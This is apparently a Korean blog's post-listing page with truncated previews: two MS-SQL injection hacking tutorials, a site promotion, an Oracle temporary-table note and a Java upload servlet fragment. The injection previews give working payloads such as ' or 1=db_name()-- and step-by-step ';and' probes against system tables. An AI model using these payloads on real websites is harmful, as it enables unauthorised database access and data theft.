mssql 인젝션 해킹 방법 들어가기 MS-SQL DBMS와 연동하여 데이터를 처리하는 웹 페이지가 있고, 웹 페이지에 에러 메시지 기반의 SQL Injection 취약점이 있다고 가정하자. 여기서 에러 메시지 기반 SQL Injection취약점 이라는 것은 SQL Injection 공격 코드(예, ' or 1=db_name()--)를 입력하였을때 SQL Query 구문 에러로 인하여 MS-SQL 에러 메시지가 웹 페이지가 출력되는 것을 의미한다. ' or 1=db_name()--이라는 SQL Injection 코드를 입력하였을 때, 출력되는 에러 메시지이다. nvarchar 값 'demoshop'을(를) int 데이터 형식의 열로 변환하는 중 구문 오류가 발생했습니다 위 에러 메시지의 demoshop 문자열이 핵심이다. demos.. 더보기 한줄댓글사이트 희한한 사이트가 나왔다 ^^ 아무것도 없는 한줄 댓글만 사용하는 사이트 흠... 무슨 재미가 있을까? 그렇지만 짬2 사이트의 특징은 앞으로 한줄 댓글 기능을 시작으로 고객들이 만들어가는 사이트를 만든다는 것이다. 앞으로 다양한 이벤트를 통해......... 고객이 원하는 서비스를 요구하면 바로바로 적용시켜 주는 특이한 사이트 이다. 사이트 주소는? http://zzam2.com 앞으로 어떻게 발전해 나갈 것인지 케릭터를 키우는 것 같은 마음으로 지켜보고 또 만들어가 봐야 할 것 같다 ^^ 더보기 중국 해커들의 DB 인젝션 해킹기법 -펌글- 중국해커의 MS SQL 인젝션 해킹기법[hacking 강좌] (www.itbank-love.com) 02 3672 0025 1. 다음과 같은 조건식을 삽입한다. ;and 1=1 ;and 1=2 ;and user>0 2. 기본적으로 제공되는 기본 시스템 오브젝트에 대한 조건식을 검사해 본다. ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 3. where 조건식을 넣어 본다. 'and ''=' 'and '%25'=' 4. select 구문을 사용한다. ;and (Select Count(*) from [테이블명])>0 -- ;and (select top 1 len(열수) from.. 더보기 임시 테이블 MS SQL [[ TEMPORARY TABLE(임시 테이블) ]] 1. 설명 개발자가 DML(INSERT, UPDATE, DELETE)문을 실행한 후 트랜젝션을 종료(commit)하더라도 변경된 테이터들이 DB테이블에 저장되지 않는 테이블이다. 즉, 잠시 데이터를 저장하는 일시적 공간 2. 데이터를 유지하는 방법 (1) ON COMMIT DELETE ROWS commit문을 실행할 때 '데이터'가 없어지는 옵션 즉, 하나의 트랜젝션이 마무리될 때 함께 데이터가 없어진다. SQL> CREATE GLOBAL TEMPORARY TABLE t1( 2 id NUMBER(5), 3 salary NUMBER(10)) ON COMMIT DELETE ROWS; SQL> SELECT * FROM tab; SQL> INSERT INTO.. 더보기 파일 업로드 파일하나로^^ response.setContentType("text/plain"); //out.println("Demo Upload Servlet using MultipartRequest"); //out.println(); try { // Use an advanced form of the constructor that specifies a character // encoding of the request (not of the file contents) and a file // rename policy. String dirName = session.getServletContext().getRealPath(""); System.out.printl.. 더보기 이전 1 ··· 56 57 58 59 60 61 다음